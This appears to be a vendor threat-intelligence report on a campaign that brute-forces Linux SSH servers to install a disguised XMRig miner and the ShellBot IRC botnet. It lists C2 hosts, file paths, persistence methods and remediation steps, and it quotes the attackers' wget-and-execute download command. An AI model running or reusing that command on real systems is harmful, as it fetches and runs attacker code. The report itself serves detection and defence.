Threat reportMalwareTL-2026-1345
XMRig CoinMiner and ShellBot (PerlBot) Campaign Targeting Linux SSH Servers via SSH Brute-Force
XMRig CoinMiner and ShellBot (PerlBot) Campaign Targeting (TL-2026-1345), also tracked as XMRig Mysql-Disguised CoinMiner / ShellBot SSH Campaign, is a high-severity malware campaign, first published 2026-07-14. It is attributed to XMRig operator with low confidence, affects N/A Poorly managed / internet-facing Linux servers (SSH service), maps to 20 MITRE ATT&CK techniques (T1021, T1027, T1036), and is covered by 9 detection rules and 32 indicators of compromise.
- Severity
- HIGHAssessed severity
- CVEs
- 0None referenced
- Techniques
- 20MITRE ATT&CK
- Actors
- 1XMRig operator
- Detection rules
- 9SPL · KQL · Sigma
- IOCs
- 32Indicators of compromise
Key facts for TL-2026-1345
- Threat ID
- TL-2026-1345
- Also known as
- XMRig Mysql-Disguised CoinMiner / ShellBot SSH Campaign
- Severity
- HIGH
- Status
- ACTIVE
- Category
- MALWARE
- First published
- Last reviewed
- Attribution
- XMRig operator
- Attribution confidence
- LOW
- Motivation
- FINANCIAL
- Target sectors
- all sectors opportunistic unmanaged linux server exposure
- Target regions
- Global
- Detection rules
- 9
- Indicators of compromise
- 32
Malware and tooling in XMRig CoinMiner and ShellBot (PerlBot) Campaign Targeting
Malware and tooling: LiGhT's Modded perlbot v2, PerlBot, xmrig, MIG LogCleaner, XHide, meta (Go propagation scanner), run (Go downloader)
How XMRig CoinMiner and ShellBot (PerlBot) Campaign Targeting works
A long-running threat actor operation, active since at least 2023 and documented by AhnLab ASEC honeypot telemetry through July 2026, brute-forces poorly managed internet-facing Linux SSH servers to deploy an XMRig cryptocurrency miner disguised as the 'mysql' process alongside the ShellBot (PerlBot) IRC-based DDoS botnet, MIG LogCleaner, and XHide process-masking utilities.
Threat actors scan the internet for Linux hosts with port 22 (SSH) exposed and run dictionary/brute-force attacks against weak or default SSH credentials. Once valid credentials are obtained and a session established, the attacker issues initial reconnaissance commands and downloads a Go-based downloader ('run') via `wget download.Xrpl[.]City/run && chmod +x run && ./run`. The downloader modifies the compromised user's password (denying re-entry to competing actors and complicating remediation) and retrieves a packaged malware bundle ('pack.jpg') that is unpacked and executed.
The bundle deploys an XMRig-based Monero CoinMiner disguised as the 'mysql' binary, installed to `/etc/ufw/.Dev/oracle-monitor` and `/dev/shm/.Sys_cache_backup` with a systemd persistence unit at `/etc/systemd/system/oracle-service.Service` and cron-based reboot persistence. The miner process is renamed via XHide (h32/h64) argv[0] spoofing to masquerade as legitimate system processes such as irqbalance, systemd-logind, dbus-daemon, or kworker kernel threads, and a watchdog script periodically checks `/dev/shm/` for the miner's presence, re-downloading it if removed. A companion Go-written propagation tool ('meta') scans other hosts on port 22 using bundled credential and IP-range wordlists ('pass'/'ranges'), deploys XMRig to newly compromised systems, and reports campaign telemetry back to `hxxp://youpost[.]In/`.
Alongside the miner, the actor installs ShellBot (also tracked as PerlBot), a Perl-based IRC botnet supporting DDoS command execution, arbitrary system control, and log manipulation, connecting to IRC C2 infrastructure at `Irc[.]Lat:80` (channel #X, admin X) and `Irc.Undernet[.]Org:6667` (channel #T3st, admin Egeu). MIG LogCleaner is deployed alongside ShellBot to purge authentication and shell history logs, hindering forensic reconstruction. The actor further deploys compiled shell-command-compiler (shc) wrapper scripts that alias standard administrative binaries (w→myw, crontab→myc, top→pot, uptime→myu) to hide CPU load, cron entries, and system uptime from defenders, staged under `/usr/share/terminfo/c/.X/.L/` and `/usr/share/terminfo/c/.X/.X/`, with additional persistence via `.bashrc` alias/symlink hijacking.
XMRig connects to a pool of mining relay endpoints (`sad[.]Lat:80`, `192.3.9[.]34:80`, `172.245.81[.]188:80`, `146.19.213[.]82:80`, `23.94.137[.]96:80`) using the command line `-u smart --tls --donate-level=0 --null-hash-report --no-color`; an alternate bundle variant ('auto.jpg') instead mines directly to pool `time.Justnames[.]In:80` under a hardcoded Monero wallet address. ASEC's broader Q4 2025 Linux SSH malware telemetry situates this activity within a wider ecosystem dominated by the P2PInfect worm (80.4% of observed attacks) and Prometei (8.3%), with ShellBot/PerlBot distribution throughout 2025 attributed in ASEC reporting to the long-running Romanian threat group RUBYCARP, which has operated ShellBot-based cryptomining/DDoS campaigns against Linux SSH servers for over a decade; ASEC's July 2026 report does not itself name an actor, so this campaign is tracked as an unattributed but toolset-consistent continuation of that lineage pending stronger attribution evidence.
MITRE ATT&CK techniques used in TL-2026-1345
Lateral Movement
Defense Evasion
T1027 Obfuscated Files or Information; T1036 Masquerading; T1070 Indicator Removal; T1564 Hide Artifacts
Persistence
T1053 Scheduled Task/Job; T1543 Create or Modify System Process; T1546 Event Triggered Execution
Discovery
T1057 Process Discovery; T1082 System Information Discovery
Execution
T1059 Command and Scripting Interpreter
Command and Control
T1071 Application Layer Protocol; T1105 Ingress Tool Transfer
Initial Access
Credential Access
Impact
T1496 Resource Hijacking; T1498 Network Denial of Service
Resource Development
T1583 Acquire Infrastructure; T1588 Obtain Capabilities
Reconnaissance
Affected products and versions in XMRig CoinMiner and ShellBot (PerlBot) Campaign Targeting
- N/A — Poorly managed / internet-facing Linux servers (SSH service)
Vulnerable versions: Any Linux distribution with SSH exposed and weak/default credentials
Fixed in: N/A - credential hygiene and configuration issue, not a software vulnerability
Remediation for XMRig CoinMiner and ShellBot (PerlBot) Campaign Targeting
Immediate actions
- Disable password-based SSH authentication and enforce key-based auth with strong passphrases
- Rotate credentials on any Linux host that permitted SSH logins from unexpected source IPs, especially any account whose password may already be attacker-modified
- Block outbound/inbound traffic to the documented C2 domains and IPs (download.xrpl.city, irc.lat, sad.lat, time.justnames.in, youpost.in, 143.20.185.252, 146.19.213.82, 172.245.81.188, 185.242.3.57, 192.3.9.34) at perimeter firewall/DNS resolver
- Hunt for the documented file paths and lock files (/etc/ufw/.Dev/oracle-monitor, /dev/shm/.Sys_cache_backup, /dev/shm/.Agt.Lck, /dev/shm/.Mnr.Lck, /etc/systemd/system/oracle-service.Service, /usr/share/terminfo/c/.X/.L/, /usr/share/terminfo/c/.X/.X/) and quarantine/remove matches
- Audit crontab entries and systemd unit files on internet-facing Linux hosts for unauthorized reboot-persistence entries
- Inspect .bashrc and shell profile files for unauthorized alias/symlink hijacking of w, crontab, top, uptime, and ls
Workarounds
- Where key-based SSH cannot yet be enforced, require MFA for SSH logins and enforce strong, unique passwords via a managed password policy
Longer-term hardening
- Deploy fail2ban or equivalent SSH brute-force rate limiting and lockout on all internet-facing Linux servers
- Move SSH off the default port 22 where operationally feasible and restrict SSH exposure via allowlisted source IPs / VPN / bastion hosts
- Deploy EDR/host-based monitoring with behavioral detection for masqueraded process names, unexpected outbound IRC traffic, and cryptomining process signatures
- Centralize and forward auth/syslog to an external log collector so MIG LogCleaner-style local log tampering cannot erase forensic evidence
- Implement network egress filtering to block unsanctioned outbound connections to mining pools and IRC ports
Weaknesses (CWE) in XMRig CoinMiner and ShellBot (PerlBot) Campaign Targeting
Timeline of XMRig CoinMiner and ShellBot (PerlBot) Campaign Targeting
- ASEC assesses that the threat actor behind this XMRig/ShellBot toolset has been conducting SSH brute-force attacks against Linux servers since at least 2023.
- ASEC first publicly documents ShellBot (Perl-based DDoS bot) being distributed to Linux SSH servers alongside Tsunami DDoS bot, log cleaners, and XMRig CoinMiner.
- ASEC and other outlets report ShellBot operators shifting download URLs from plain IP addresses to hexadecimal notation to evade detection and blocklists.
- Throughout 2025, ASEC observes RUBYCARP distributing two ShellBot variants against Linux SSH servers: an advanced 'LiGhT's Modded perlbot v2' supporting IRC flooding, DDoS, scanning, and reverse shells, and a simplified DDoS/port-scanning variant; both share the distinctive @auth infrastructure string 'netadmin.fuckoff.org'.
- ASEC's Q4 2025 honeypot telemetry period during which P2PInfect, Prometei, and XMRig activity against Linux SSH servers is measured, with ShellBot/PerlBot distribution throughout 2025 tied in ASEC reporting to the long-running RUBYCARP threat group.
- ASEC publishes its Q4 2025 Linux SSH server malware statistics report, showing P2PInfect (80.4%) dominating honeypot-observed attacks, followed by Prometei (8.3%) and XMRig (2.4%), with IoT-targeting malware (Mirai, Gafgyt, Tsunami) also observed alongside coin miners and DDoS bots.
- AhnLab ASEC publishes a case study documenting the current campaign: an XMRig CoinMiner disguised as 'mysql', ShellBot IRC botnet, MIG LogCleaner, and XHide process-masking tools deployed via SSH brute force, with 5 C2 domains, 5 C2 IPs, and 5 file hashes.
- Threadlinqs Intelligence Platform ingests the ASEC report via RSS hunt pipeline and opens threat record TL-2026-1345 for full research and detection engineering.
Sources cited for XMRig CoinMiner and ShellBot (PerlBot) Campaign Targeting
- Case Study: Distribution of a CoinMiner Targeting Linux SSH Servers via Malware Distribution via Network Transmission
- Statistics Report on Malware Targeting Linux SSH Servers in Q4 2025
- ShellBot Malware Being Distributed to Linux SSH Servers
- ShellBot DDoS Malware Installed Through Hexadecimal Notation Addresses
- ShellBot Uses Hex IPs to Evade Detection in Attacks on Linux SSH Servers
- ShellBot DDoS Malware Targets Poorly Managed Linux Servers
- New ShellBot bot targets poorly managed Linux SSH Servers
Detection coverage for TL-2026-1345
As of 2026-07-14, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-1345 across Splunk SPL, Microsoft KQL and Sigma, covering 32 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.